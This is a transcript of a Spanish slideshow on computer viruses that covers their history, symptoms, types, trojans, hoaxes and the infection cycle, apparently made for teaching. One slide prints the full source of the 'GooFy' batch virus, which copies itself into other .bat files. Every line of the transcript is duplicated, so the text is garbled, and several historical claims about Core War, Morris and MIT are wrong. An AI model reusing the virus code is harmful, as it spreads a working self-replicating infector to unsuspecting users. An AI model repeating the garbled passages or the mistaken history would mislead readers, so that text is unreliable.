los virus

114
VS

Upload: profesorimsi

Post on 11-Jun-2015

4.434 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: LOS VIRUS

VS

Page 2: LOS VIRUS

INDICE:INDICE:

1-Introduccion 1-Introduccion 2-Los virus 2-Los virus

informaticosinformaticos 3-Hackers3-Hackers 4-Seguridad4-Seguridad 5-Otras amenazas5-Otras amenazas

Page 3: LOS VIRUS

1-INTRODUCCION:1-INTRODUCCION: Los virus son una de las muchas amenazas que pueden sufrir hoy Los virus son una de las muchas amenazas que pueden sufrir hoy

nuestros ordenadores. nuestros ordenadores. En 1939 John Von Neuman escribió un articulo en donde exponía En 1939 John Von Neuman escribió un articulo en donde exponía

su teoría de la existencia de autómatas complejos donde su teoría de la existencia de autómatas complejos donde demostraba la posibilidad de desarrollar pequeños programas que demostraba la posibilidad de desarrollar pequeños programas que pudieran tomar el control de otros de similar estructura y llegaría pudieran tomar el control de otros de similar estructura y llegaría a ser cierta su teoría pero pasaría algo de tiempo hasta llegar a la a ser cierta su teoría pero pasaría algo de tiempo hasta llegar a la extensión que tienen actualmente sus llamados autómatas el extensión que tienen actualmente sus llamados autómatas el primer paso lo darían tres jóvenes programadores (en 1949) en los primer paso lo darían tres jóvenes programadores (en 1949) en los laboratorios de AT&T bell estos tres jóvenes (Robert Thomas laboratorios de AT&T bell estos tres jóvenes (Robert Thomas Morris, Douglas MC Llory, Victor Vysottsky) a manera de Morris, Douglas MC Llory, Victor Vysottsky) a manera de entretenimiento crearon un juego llamado entretenimiento crearon un juego llamado CORE WAR O GUERRA CORE WAR O GUERRA NUCLEAR NUCLEAR dicho juego consistía en una batalla entre los códigos de dicho juego consistía en una batalla entre los códigos de dos programadores en la que cada jugador desarrollaba un dos programadores en la que cada jugador desarrollaba un programa cuya misión era acaparar la máxima memoria posible programa cuya misión era acaparar la máxima memoria posible mediante la reproducción de si mismo. mediante la reproducción de si mismo.

Este juego fue motivo de varios concursos en importantes centros Este juego fue motivo de varios concursos en importantes centros de investigación como el de la XEROX en California y el de investigación como el de la XEROX en California y el MASSACHUSSET TECHNOLOGY INSTITUTE (MAT), entre otros.MASSACHUSSET TECHNOLOGY INSTITUTE (MAT), entre otros.

Page 4: LOS VIRUS

CONTINUACION:CONTINUACION:

En 1988 ROBERT TAPPAN MORRIS HIJO de ROBERT THOMAS En 1988 ROBERT TAPPAN MORRIS HIJO de ROBERT THOMAS MORRIS introdujo un virus en arpanet precursora de internet MORRIS introdujo un virus en arpanet precursora de internet los daños que causo en la red se estimaron en 100 millones los daños que causo en la red se estimaron en 100 millones de dólares lo que provoco que en la actualidad este de dólares lo que provoco que en la actualidad este procesado (arpanet fue una creación del ministerio de procesado (arpanet fue una creación del ministerio de defensa americano cuya funcion era la de ser una red de defensa americano cuya funcion era la de ser una red de comunicación interna y que luego se extendió a los hogares comunicación interna y que luego se extendió a los hogares hasta llegar a su actual denominación como internet).Tras hasta llegar a su actual denominación como internet).Tras estos y otros acontecimientos sobre apariciones de virus se estos y otros acontecimientos sobre apariciones de virus se ha investigado y se sigue investigando a pesar de que cada ha investigado y se sigue investigando a pesar de que cada dia aparecen nuevos virus cada vez mas dañinos la dia aparecen nuevos virus cada vez mas dañinos la existencia de los antivirus hará posible la desaparición de existencia de los antivirus hará posible la desaparición de algunos de estos virus pero no podemos olvidar el papel algunos de estos virus pero no podemos olvidar el papel fundamental de los hackers que en su mayoría crean estos fundamental de los hackers que en su mayoría crean estos virus con fines malignos todo comenzó con el hijo de robert virus con fines malignos todo comenzó con el hijo de robert Thomas morris pero con la evolución de las tecnologías Thomas morris pero con la evolución de las tecnologías estos han evolucionado todo esto y mas lo desarrollaremos estos han evolucionado todo esto y mas lo desarrollaremos en los siguientes puntos del trabajo en los siguientes puntos del trabajo

Page 5: LOS VIRUS

2-LOS VIRUS INFORMATICOS2-LOS VIRUS INFORMATICOS

Page 6: LOS VIRUS

2.1-VIRUS: DEFINICION:2.1-VIRUS: DEFINICION:

Un virus es un pequeño segmento de código ejecutable Un virus es un pequeño segmento de código ejecutable escrito en ensamblador o lenguaje de macro, capaz de escrito en ensamblador o lenguaje de macro, capaz de tomar el control de la maquina o aplicación en algún tomar el control de la maquina o aplicación en algún momento y auto replicarse, alojándose en un soporte momento y auto replicarse, alojándose en un soporte diferente al que se encontraba originalmente. diferente al que se encontraba originalmente.

Page 7: LOS VIRUS

2.2¿COMO SE DETECTA UN 2.2¿COMO SE DETECTA UN VIRUS?VIRUS?

Cambio de longitud en archivos. Cambio de longitud en archivos. Modificación de la fecha original de los archivos. Modificación de la fecha original de los archivos. Aparición de archivos o directorios extraños. Aparición de archivos o directorios extraños. Dificultad para arrancar el PC o no conseguir inicializarlo. Dificultad para arrancar el PC o no conseguir inicializarlo. El PC se "re-bootea" frecuentemente Bloqueo del teclado. El PC se "re-bootea" frecuentemente Bloqueo del teclado. El PC no reconoce el disco duro. Ralentización en la velocidad El PC no reconoce el disco duro. Ralentización en la velocidad

de ejecución de los programas. de ejecución de los programas. Archivos que se ejecutan mal. Archivos que se ejecutan mal. El PC no reconoce las disqueteras. Se borran archivos El PC no reconoce las disqueteras. Se borran archivos

inexplicablemente. Aparecen nuevas macros en documentos de inexplicablemente. Aparecen nuevas macros en documentos de Word. Word.

La opción "ver macros" se desactiva. La opción "ver macros" se desactiva. Pide passwords no configurados por el usuario. O, por supuesto, Pide passwords no configurados por el usuario. O, por supuesto,

con un software anti-virus ADECUADO y ACTUALIZADO que con un software anti-virus ADECUADO y ACTUALIZADO que detecte su presenciadetecte su presencia

Page 8: LOS VIRUS

2.2-COMO CLASIFICAR LOS 2.2-COMO CLASIFICAR LOS VIRUS:VIRUS:

Dependiendo del lugar donde se alojan, la técnica de Dependiendo del lugar donde se alojan, la técnica de replicación o la plataforma en la cual trabajan, podemos replicación o la plataforma en la cual trabajan, podemos diferenciar en distintos tipos de virus. diferenciar en distintos tipos de virus.    

Existen ocho categorías de virus: Existen ocho categorías de virus: Parásitos. Parásitos. Del sector de arranque inicial. Del sector de arranque inicial. Multipartitos.Multipartitos. Acompañantes. Acompañantes. De vínculo.De vínculo. De fichero de datos.De fichero de datos. Virus de macro.Virus de macro. Virus e-mail.Virus e-mail.

Page 9: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Además de estos tipos también existen otros programas Además de estos tipos también existen otros programas informáticos nocivos similares a los virus, pero que no informáticos nocivos similares a los virus, pero que no cumplen ambos requisitos de reproducirse y eludir su cumplen ambos requisitos de reproducirse y eludir su detección. Estos programas se dividen en tres categorías:detección. Estos programas se dividen en tres categorías:

Caballos de Troya.Caballos de Troya.

Bombas lógicas.Bombas lógicas.

Gusanos.Gusanos.

Y por ultimo estan los denominados parásitos que son dos:Y por ultimo estan los denominados parásitos que son dos:

De acción directaDe acción directa

residentesresidentes

Page 10: LOS VIRUS

2.3-TIPOS DE VIRUS:2.3-TIPOS DE VIRUS:

RESIDENTES RESIDENTES

DE ACCION DIRECTADE ACCION DIRECTA DE SOBREESCRITURADE SOBREESCRITURA DE BOOTDE BOOT DE MACRODE MACRO DE ENLACE O DIRECTORIODE ENLACE O DIRECTORIO ENCRIPTADOS ENCRIPTADOS POLIFORMICOSPOLIFORMICOS MULTIPARTITESMULTIPARTITES

DE FATDE FAT TROYANOSTROYANOS GUSANOSGUSANOS BOMBAS LOGICAS BOMBAS LOGICAS VIRUS FALSOSVIRUS FALSOS DIALERDIALER DE FICHERODE FICHERO DE COMPAÑÍADE COMPAÑÍA BATBAT

Page 11: LOS VIRUS

2.3.1-DEFINICION DE LOS TIPOS 2.3.1-DEFINICION DE LOS TIPOS DE VIRUS:DE VIRUS:

Virus residentes o parásitos:Virus residentes o parásitos: La característica principal de estos virus es que se ocultan La característica principal de estos virus es que se ocultan

en la memoria RAM de forma permanente o residente. De en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados, etc.ejecutados, abiertos, cerrados, renombrados, copiados, etc.

Estos virus sólo atacan cuando se cumplen ciertas Estos virus sólo atacan cuando se cumplen ciertas condiciones definidas previamente por su creador (por condiciones definidas previamente por su creador (por ejemplo, una fecha y hora determinada). Mientras tanto, ejemplo, una fecha y hora determinada). Mientras tanto, permanecen ocultos en una zona de la memoria principal, permanecen ocultos en una zona de la memoria principal, ocupando un espacio de la misma, hasta que son detectados ocupando un espacio de la misma, hasta que son detectados y eliminados.y eliminados.

Algunos ejemplos de este tipo de virus son: Randex, CMJ, Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.Meve, MrKlunky.

Page 12: LOS VIRUS

2.3.2-DE ACCION DIRECTA O 2.3.2-DE ACCION DIRECTA O PARASITOS:PARASITOS:

Al contrario que los residentes, estos virus no permanecen Al contrario que los residentes, estos virus no permanecen en memoria. Por tanto, su objetivo prioritario es en memoria. Por tanto, su objetivo prioritario es reproducirse y actuar en el mismo momento de ser reproducirse y actuar en el mismo momento de ser ejecutados. Al cumplirse una determinada condición, se ejecutados. Al cumplirse una determinada condición, se activan y buscan los ficheros ubicados dentro de su mismo activan y buscan los ficheros ubicados dentro de su mismo directorio para contagiarlos.directorio para contagiarlos.

Además, también realizan sus acciones en los directorios Además, también realizan sus acciones en los directorios especificados dentro de la línea PATH (camino o ruta de especificados dentro de la línea PATH (camino o ruta de directorios), dentro del fichero AUTO EXEC.BAT (fichero que directorios), dentro del fichero AUTO EXEC.BAT (fichero que siempre se encuentra en el directorio raíz del disco duro).siempre se encuentra en el directorio raíz del disco duro).

Los virus de acción directa presentan la ventaja de que los Los virus de acción directa presentan la ventaja de que los ficheros afectados por ellos pueden ser desinfectados y ficheros afectados por ellos pueden ser desinfectados y restaurados completamente.restaurados completamente.

Page 13: LOS VIRUS

2.3.3-DE SOBREESCRITURA:2.3.3-DE SOBREESCRITURA:

Estos virus se caracterizan por destruir la información Estos virus se caracterizan por destruir la información contenida en los ficheros que infectan. Cuando infectan un contenida en los ficheros que infectan. Cuando infectan un fichero, escriben dentro de su contenido, haciendo que fichero, escriben dentro de su contenido, haciendo que queden total o parcialmente inservibles.queden total o parcialmente inservibles.

También se diferencian porque los ficheros infectados no También se diferencian porque los ficheros infectados no aumentan de tamaño, a no ser que el virus ocupe más aumentan de tamaño, a no ser que el virus ocupe más espacio que el propio fichero (esto se debe a que se colocan espacio que el propio fichero (esto se debe a que se colocan encima del fichero infectado, en vez de ocultarse dentro del encima del fichero infectado, en vez de ocultarse dentro del mismo).mismo).

La única forma de limpiar un fichero infectado por un virus La única forma de limpiar un fichero infectado por un virus de sobre escritura es borrarlo, perdiéndose su contenido.de sobre escritura es borrarlo, perdiéndose su contenido.

Algunos ejemplos de este tipo de virus son: Way, Trj.Reboot, Algunos ejemplos de este tipo de virus son: Way, Trj.Reboot, Trivial.88.D.Trivial.88.D.

Page 14: LOS VIRUS

2.3.4-BOOT O DE ARRANQUE:2.3.4-BOOT O DE ARRANQUE:

Los términos boot o sector de arranque hacen referencia a Los términos boot o sector de arranque hacen referencia a una sección muy importante de un disco (tanto un disquete una sección muy importante de un disco (tanto un disquete como un disco duro respectivamente). En ella se guarda la como un disco duro respectivamente). En ella se guarda la información esencial sobre las características del disco y se información esencial sobre las características del disco y se encuentra un programa que permite arrancar el ordenador.encuentra un programa que permite arrancar el ordenador.

Este tipo de virus no infecta ficheros, sino los discos que los Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actúan infectando en primer lugar el sector de contienen. Actúan infectando en primer lugar el sector de arranque de los disquetes. Cuando un ordenador se pone en arranque de los disquetes. Cuando un ordenador se pone en marcha con un disquete infectado, el virus de boot infectará marcha con un disquete infectado, el virus de boot infectará a su vez el disco duro.a su vez el disco duro.

Los virus de boot no pueden afectar al ordenador mientras Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a éste último con un disco no se intente poner en marcha a éste último con un disco infectado. Por tanto, el mejor modo de defenderse contra infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los disquetes contra escritura y no arrancar ellos es proteger los disquetes contra escritura y no arrancar nunca el ordenador con un disquete desconocido en la nunca el ordenador con un disquete desconocido en la disquetera.disquetera.

Algunos ejemplos de este tipo de virus son: Polyboot.B, Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.AntiEXE.

Page 15: LOS VIRUS

2.3.5-DE MACRO:2.3.5-DE MACRO: El objetivo de estos virus es la infección de los ficheros El objetivo de estos virus es la infección de los ficheros

creados usando determinadas aplicaciones que contengan creados usando determinadas aplicaciones que contengan macros: documentos de Word (ficheros con extensión DOC), macros: documentos de Word (ficheros con extensión DOC), hojas de cálculo de Excel (ficheros con extensión XLS), hojas de cálculo de Excel (ficheros con extensión XLS), bases de datos de Access (ficheros con extensión MDB), bases de datos de Access (ficheros con extensión MDB), presentaciones de PowerPoint (ficheros con extensión PPS), presentaciones de PowerPoint (ficheros con extensión PPS), ficheros de Corel Draw, etc.ficheros de Corel Draw, etc.

Las macros son micro-programas asociados a un fichero, Las macros son micro-programas asociados a un fichero, que sirven para automatizar complejos conjuntos de que sirven para automatizar complejos conjuntos de operaciones. Al ser programas, las macros pueden ser operaciones. Al ser programas, las macros pueden ser infectadas. infectadas.

Cuando se abre un fichero que contenga un virus de este Cuando se abre un fichero que contenga un virus de este tipo, las macros se cargarán de forma automática, tipo, las macros se cargarán de forma automática, produciéndose la infección. La mayoría de las aplicaciones produciéndose la infección. La mayoría de las aplicaciones que utilizan macros cuentan con una protección antivirus y que utilizan macros cuentan con una protección antivirus y de seguridad específica, pero muchos virus de macro de seguridad específica, pero muchos virus de macro sortean fácilmente dicha protección.sortean fácilmente dicha protección.

Existe un tipo diferente de virus de macro según la Existe un tipo diferente de virus de macro según la herramienta usada: de Word, de Excel, de Access, de herramienta usada: de Word, de Excel, de Access, de PowerPoint, multiprograma o de archivos RTF. Sin embargo, PowerPoint, multiprograma o de archivos RTF. Sin embargo, no todos los programas o herramientas con macros pueden no todos los programas o herramientas con macros pueden ser afectadas por estos virus.ser afectadas por estos virus.

Estos son algunos ejemplos: Relax, Melissa.A, Bablas, Estos son algunos ejemplos: Relax, Melissa.A, Bablas, O97M/Y2K.O97M/Y2K.

Page 16: LOS VIRUS

2.3.6-DE ENLACE O 2.3.6-DE ENLACE O DIRECTORIO:DIRECTORIO: Los ficheros se ubican en determinadas direcciones Los ficheros se ubican en determinadas direcciones

(compuestas básicamente por unidad de disco y directorio), (compuestas básicamente por unidad de disco y directorio), que el sistema operativo conoce para poder localizarlos y que el sistema operativo conoce para poder localizarlos y trabajar con ellos.trabajar con ellos.

Los virus de enlace o directorio alteran las direcciones que Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo, al indican donde se almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero con extensión EXE o intentar ejecutar un programa (fichero con extensión EXE o COM) infectado por un virus de enlace, lo que se hace en COM) infectado por un virus de enlace, lo que se hace en realidad es ejecutar el virus, ya que éste habrá modificado la realidad es ejecutar el virus, ya que éste habrá modificado la dirección donde se encontraba originalmente el programa, dirección donde se encontraba originalmente el programa, colocándose en su lugar.colocándose en su lugar.

Una vez producida la infección, resulta imposible localizar y Una vez producida la infección, resulta imposible localizar y trabajar con los ficheros originales.trabajar con los ficheros originales.

Page 17: LOS VIRUS

2.3.7-ENCRIPTADOS:2.3.7-ENCRIPTADOS:

Más que un tipo de virus, se trata de una técnica Más que un tipo de virus, se trata de una técnica utilizada por algunos de ellos, que a su vez pueden utilizada por algunos de ellos, que a su vez pueden pertenecer a otras clasificaciones.pertenecer a otras clasificaciones.

Estos virus se cifran o encriptan a sí mismos para no Estos virus se cifran o encriptan a sí mismos para no ser detectados por los programas antivirus. Para ser detectados por los programas antivirus. Para realizar sus actividades, el virus se descifra a sí realizar sus actividades, el virus se descifra a sí mismo y, cuando ha finalizado, se vuelve a cifrar.mismo y, cuando ha finalizado, se vuelve a cifrar.

Estos son algunos ejemplos de este tipo de virus: Estos son algunos ejemplos de este tipo de virus: Elvira, Trile.Elvira, Trile.

Page 18: LOS VIRUS

2.3.8-POLIFORMICOS:2.3.8-POLIFORMICOS:

Son virus que en cada infección que realizan se cifran o Son virus que en cada infección que realizan se cifran o encriptan de una forma distinta (utilizando diferentes encriptan de una forma distinta (utilizando diferentes algoritmos y claves de cifrado).algoritmos y claves de cifrado).

De esta forma, generan una elevada cantidad de copias de De esta forma, generan una elevada cantidad de copias de sí mismos e impiden que los antivirus los localicen a través sí mismos e impiden que los antivirus los localicen a través de la búsqueda de cadenas o firmas, por lo que suelen ser de la búsqueda de cadenas o firmas, por lo que suelen ser los virus más costosos de detectar.los virus más costosos de detectar.

Algunos ejemplos de este tipo de virus son: Elkern, Marburg, Algunos ejemplos de este tipo de virus son: Elkern, Marburg, Satan Bug, Tuareg.Satan Bug, Tuareg.

Page 19: LOS VIRUS

3.2.9-MULTIPARTITES:3.2.9-MULTIPARTITES:

Virus muy avanzados, que pueden realizar múltiples Virus muy avanzados, que pueden realizar múltiples infecciones, combinando diferentes técnicas para ello. infecciones, combinando diferentes técnicas para ello. Su objetivo es cualquier elemento que pueda ser Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc.infectado: archivos, programas, macros, discos, etc.

Se consideran muy peligrosos por su capacidad de Se consideran muy peligrosos por su capacidad de combinar muchas técnicas de infección y por los combinar muchas técnicas de infección y por los dañinos efectos de sus acciones.dañinos efectos de sus acciones.

Algunos ejemplos de estos virus son: YwinzAlgunos ejemplos de estos virus son: Ywinz..

Page 20: LOS VIRUS

3.2.10-DE FICHERO:3.2.10-DE FICHERO:

Infectan programas o ficheros ejecutables (ficheros Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el con extensiones EXE y COM). Al ejecutarse el programa infectado, el virus se activa, produciendo programa infectado, el virus se activa, produciendo diferentes efectos.diferentes efectos.

La mayoría de los virus existentes son de este tipo.La mayoría de los virus existentes son de este tipo.

Page 21: LOS VIRUS

3.2.11-DE COMPAÑÍA:3.2.11-DE COMPAÑÍA:

Son virus de fichero que al mismo tiempo pueden ser Son virus de fichero que al mismo tiempo pueden ser residentes o de acción directa. Su nombre deriva de residentes o de acción directa. Su nombre deriva de que "acompañan" a otros ficheros existentes en el que "acompañan" a otros ficheros existentes en el sistema antes de su llegada, sin modificarlos como sistema antes de su llegada, sin modificarlos como hacen los virus de sobreescritura o los residentes.hacen los virus de sobreescritura o los residentes.

Para efectuar las infecciones, los virus de compañía Para efectuar las infecciones, los virus de compañía pueden esperar ocultos en la memoria hasta que se pueden esperar ocultos en la memoria hasta que se lleve a cabo la ejecución de algún programa, o actuar lleve a cabo la ejecución de algún programa, o actuar directamente haciendo copias de sí mismos.directamente haciendo copias de sí mismos.

Algunos ejemplos de este tipo de virus son: Stator, Algunos ejemplos de este tipo de virus son: Stator, Asimov.1539, Terrax.1069.Asimov.1539, Terrax.1069.

Page 22: LOS VIRUS

3.2.12-DE FAT: 3.2.12-DE FAT:

La Tabla de Asignación de Ficheros o FAT es la La Tabla de Asignación de Ficheros o FAT es la sección de un disco utilizada para enlazar la sección de un disco utilizada para enlazar la información contenida en éste. Se trata de un información contenida en éste. Se trata de un elemento fundamental en el sistema.elemento fundamental en el sistema.

Los virus que atacan a este elemento son Los virus que atacan a este elemento son especialmente peligrosos, ya que impedirán el acceso especialmente peligrosos, ya que impedirán el acceso a ciertas partes del disco, donde se almacenan los a ciertas partes del disco, donde se almacenan los ficheros críticos para el normal funcionamiento del ficheros críticos para el normal funcionamiento del ordenador. Los daños causados a la FAT se traducirán ordenador. Los daños causados a la FAT se traducirán en pérdidas de la información contenida en ficheros en pérdidas de la información contenida en ficheros individuales y en directorios completos. individuales y en directorios completos.

Page 23: LOS VIRUS

3.2.13-WORMS 3.2.13-WORMS (GUSANOS):(GUSANOS):

De un modo estricto, los gusanos no se consideran virus porque De un modo estricto, los gusanos no se consideran virus porque no no necesitan infectar otros ficherosnecesitan infectar otros ficheros para reproducirse. A efectos para reproducirse. A efectos prácticos, son tratados como virus y son detectados y eliminados prácticos, son tratados como virus y son detectados y eliminados por los antivirus.por los antivirus.

Básicamente, Básicamente, los gusanos se limitan a realizar copias de sí los gusanos se limitan a realizar copias de sí mismos a la máxima velocidad posiblemismos a la máxima velocidad posible, sin tocar ni dañar , sin tocar ni dañar ningún otro fichero. Sin embargo, se reproducen a tal velocidad que ningún otro fichero. Sin embargo, se reproducen a tal velocidad que pueden colapsar por saturación las redes en las que se infiltran.pueden colapsar por saturación las redes en las que se infiltran.

Las infecciones producidas por estos virus casi siempre se realizan a Las infecciones producidas por estos virus casi siempre se realizan a través del correo electrónico, las redes informáticas y los canales de través del correo electrónico, las redes informáticas y los canales de chat (tipo IRC o ICQ) de Internet. También pueden propagarse chat (tipo IRC o ICQ) de Internet. También pueden propagarse dentro de la memoria del ordenador. dentro de la memoria del ordenador.

Page 24: LOS VIRUS

3.2.14-TROYANOS O CABALLOS 3.2.14-TROYANOS O CABALLOS DE TROYA:DE TROYA: Técnicamente, los Troyanos tampoco se consideran virus, ya Técnicamente, los Troyanos tampoco se consideran virus, ya

que no se reproducen infectando otros ficheros. Tampoco se que no se reproducen infectando otros ficheros. Tampoco se propagan haciendo copias de sí mismo como hacen los propagan haciendo copias de sí mismo como hacen los gusanos. A efectos prácticos, son tratados como virus y son gusanos. A efectos prácticos, son tratados como virus y son detectados y eliminados por los antivirus.detectados y eliminados por los antivirus.

El objetivo básico de estos virus es la introducción e El objetivo básico de estos virus es la introducción e instalación de otros programas en el ordenador, para instalación de otros programas en el ordenador, para permitir su control remoto desde otros equipos.permitir su control remoto desde otros equipos.

Su nombre deriva del parecido en su forma de actuar de los Su nombre deriva del parecido en su forma de actuar de los astutos griegos de la mitología: llegan al ordenador como un astutos griegos de la mitología: llegan al ordenador como un programa aparentemente inofensivo. Sin embargo, al programa aparentemente inofensivo. Sin embargo, al ejecutarlo instalará en nuestro ordenador un segundo ejecutarlo instalará en nuestro ordenador un segundo programa, el troyano.programa, el troyano.

Los efectos de los Troyanos pueden ser muy peligrosos. Al Los efectos de los Troyanos pueden ser muy peligrosos. Al igual que los virus, tienen la capacidad de eliminar ficheros igual que los virus, tienen la capacidad de eliminar ficheros o destruir la información del disco duro. Pero además o destruir la información del disco duro. Pero además pueden capturar y reenviar datos confidenciales a una pueden capturar y reenviar datos confidenciales a una dirección externa o abrir puertos de comunicaciones, dirección externa o abrir puertos de comunicaciones, permitiendo que un posible intruso controle nuestro permitiendo que un posible intruso controle nuestro ordenador de forma remota.ordenador de forma remota.

Estos son algunos ejemplos de Troyanos: IRC.Sx2, Trifor.Estos son algunos ejemplos de Troyanos: IRC.Sx2, Trifor.

Page 25: LOS VIRUS

-TIPOS DE TROYANOS-TIPOS DE TROYANOS

1-BACKDOORS1-BACKDOORS 2-TROYANOS EN 2-TROYANOS EN

GENERALGENERAL 3-TROYANOS PSW3-TROYANOS PSW 4-TROYANOS CLIKERS4-TROYANOS CLIKERS 5-TROYANOS 5-TROYANOS

DOWNLOADERSDOWNLOADERS 6-TROYANOS 6-TROYANOS

DROPPERSDROPPERS

7-TROYANOS PROXIES7-TROYANOS PROXIES 8-TROYANOS ESPIAS8-TROYANOS ESPIAS 9-TROYANOS 9-TROYANOS

NOTIFIERSNOTIFIERS 10-ROOTKITS10-ROOTKITS 11-ARC BOMBS11-ARC BOMBS

Page 26: LOS VIRUS

3.2.15-DIALERS:3.2.15-DIALERS:

Los Dialers son programas que se instalan en el ordenador y que, Los Dialers son programas que se instalan en el ordenador y que, llaman a números de llaman a números de tarifación adicionaltarifación adicional sin que el usuario lo sepa. sin que el usuario lo sepa. Se suelen instalar mediante un fichero ejecutable (.exe) o mediante la Se suelen instalar mediante un fichero ejecutable (.exe) o mediante la descarga de un control ActiveX. descarga de un control ActiveX.

Page 27: LOS VIRUS

3.2.15-BOMBAS LOGICAS:3.2.15-BOMBAS LOGICAS:

Tampoco se consideran estrictamente virus, ya que Tampoco se consideran estrictamente virus, ya que no se reproducen. Ni siquiera son programas no se reproducen. Ni siquiera son programas independientes, sino un segmento camuflado dentro independientes, sino un segmento camuflado dentro de otro programa.de otro programa.

Tienen por objetivo destruir los datos de un Tienen por objetivo destruir los datos de un ordenador o causar otros daños de consideración en ordenador o causar otros daños de consideración en él cuando se cumplen ciertas condiciones. Mientras él cuando se cumplen ciertas condiciones. Mientras este hecho no ocurre, nadie se percata de la este hecho no ocurre, nadie se percata de la presencia de la bomba lógica. Su acción puede llegar presencia de la bomba lógica. Su acción puede llegar a ser tremendamente destructiva.a ser tremendamente destructiva.

Page 28: LOS VIRUS

3.2.16-FALSOS:3.2.16-FALSOS:

Al margen de las divisiones anteriores, existen ciertos Al margen de las divisiones anteriores, existen ciertos tipos de mensajes o programas que en ciertos casos son tipos de mensajes o programas que en ciertos casos son confundidos con virus, pero que no son virus en ningún confundidos con virus, pero que no son virus en ningún sentido.sentido.

El principal componente de este grupo son los hoaxes o El principal componente de este grupo son los hoaxes o bulos. Los hoaxes no son virus, sino mensajes de correo bulos. Los hoaxes no son virus, sino mensajes de correo electrónico engañosos, que se difunden masivamente por electrónico engañosos, que se difunden masivamente por Internet sembrando la alarma sobre supuestas infecciones Internet sembrando la alarma sobre supuestas infecciones víricas y amenazas contra los usuarios. víricas y amenazas contra los usuarios.

Los hoaxes tratan de ganarse la confianza de los usuarios Los hoaxes tratan de ganarse la confianza de los usuarios aportando datos que parecen ciertos y proponiendo una aportando datos que parecen ciertos y proponiendo una serie de acciones a realizar para librarse de la supuesta serie de acciones a realizar para librarse de la supuesta infección.infección.

Si se recibe un hoax, no hay que hacer caso de sus Si se recibe un hoax, no hay que hacer caso de sus advertencias e instrucciones: lo más aconsejable es advertencias e instrucciones: lo más aconsejable es borrarlo sin prestarle la más mínima atención y no borrarlo sin prestarle la más mínima atención y no reenviarlo a otras personasreenviarlo a otras personas..

Page 29: LOS VIRUS

2.4-¿COMO ACTUA UN VIRUS 2.4-¿COMO ACTUA UN VIRUS INFORMATICO?: INFORMATICO?: El ciclo de los virus informático es muy similar al de los El ciclo de los virus informático es muy similar al de los

biológicos (de ahí su nombre). biológicos (de ahí su nombre).

1-Infección:1-Infección: Al ejecutar un archivo infectado (el código del Al ejecutar un archivo infectado (el código del virus se ha implantado en el archivo anteriormente) virus se ha implantado en el archivo anteriormente) comienza la fase de infección, duplicándose e implantándose comienza la fase de infección, duplicándose e implantándose en otros archivos ejecutables. Comienza la "invasión" del en otros archivos ejecutables. Comienza la "invasión" del sistema informático. La víctima, aún no es consciente de la sistema informático. La víctima, aún no es consciente de la existencia del virus ya que este permanece oculto y sin existencia del virus ya que este permanece oculto y sin causar daños apreciablescausar daños apreciables. .

2-Expansión:2-Expansión: El virus pasará a otros ordenadores, a través de El virus pasará a otros ordenadores, a través de redes informáticas, disquetes y CDs que contengan archivos redes informáticas, disquetes y CDs que contengan archivos infectados, software en Internet, archivos adjuntos a infectados, software en Internet, archivos adjuntos a mensaje electrónicos, etc. mensaje electrónicos, etc.

3-Explosión:3-Explosión: Si el virus no ha sido detectado y destruido por Si el virus no ha sido detectado y destruido por algún programa antivirus, en un momento determinado o algún programa antivirus, en un momento determinado o bajo determinadas circunstancias, tomará el control del bajo determinadas circunstancias, tomará el control del ordenador infectado, ejecutando la acción para la que fue ordenador infectado, ejecutando la acción para la que fue programado. En este momento, debido a los trágicos efectos programado. En este momento, debido a los trágicos efectos que pueden llegar a ocasionar, se hará evidente su que pueden llegar a ocasionar, se hará evidente su existencia, acabando con información vital contenida en el existencia, acabando con información vital contenida en el sistema informático. sistema informático.

Page 30: LOS VIRUS

2.5-¿COMO ES EL CODIGO 2.5-¿COMO ES EL CODIGO FUENTE DE UN VIRUS?:EJEMPLO FUENTE DE UN VIRUS?:EJEMPLO ¨ GOOFY ¨¨ GOOFY ¨ @echo off%[GooFy]%@echo off%[GooFy]%

if '%1==' 42! goto GooFy%2if '%1==' 42! goto GooFy%2 if exist \GooFy_.Bat goto GooFyRunif exist \GooFy_.Bat goto GooFyRun if not exist %0.bat goto GooFyOutif not exist %0.bat goto GooFyOut find "GooFy"<%0.bat>\GooFy_.Batfind "GooFy"<%0.bat>\GooFy_.Bat :GooFyRun Root Bat in a shell:GooFyRun Root Bat in a shell command /c \GooFy_.Bat 42! Vircommand /c \GooFy_.Bat 42! Vir goto GooFyOut and run the hostgoto GooFyOut and run the host :GooFyVir Looks for BATs in current and parent:GooFyVir Looks for BATs in current and parent for %%a in (*.bat ..\*.bat) do call %0 42! GooFy %%afor %%a in (*.bat ..\*.bat) do call %0 42! GooFy %%a exit GooFy without doing anythingexit GooFy without doing anything :GooFyGooFy Only works with DOS 6:GooFyGooFy Only works with DOS 6 find "GooFy"<%3>nul.amIhere?find "GooFy"<%3>nul.amIhere? if not errorlevel 1 goto GooFyOutif not errorlevel 1 goto GooFyOut type \GooFy_.bat>GooFy$type \GooFy_.bat>GooFy$ type %3>>GooFy$type %3>>GooFy$ move GooFy$ %3>nulmove GooFy$ %3>nul exit GooFy after infecting one batchexit GooFy after infecting one batch :GooFyOut *** the GooFy Batch Vir ***:GooFyOut *** the GooFy Batch Vir *** ::--- and here's your host...::--- and here's your host...

Page 31: LOS VIRUS

2.6-TECNICAS DE 2.6-TECNICAS DE PROGRAMACION DE UN VIRUS:PROGRAMACION DE UN VIRUS:

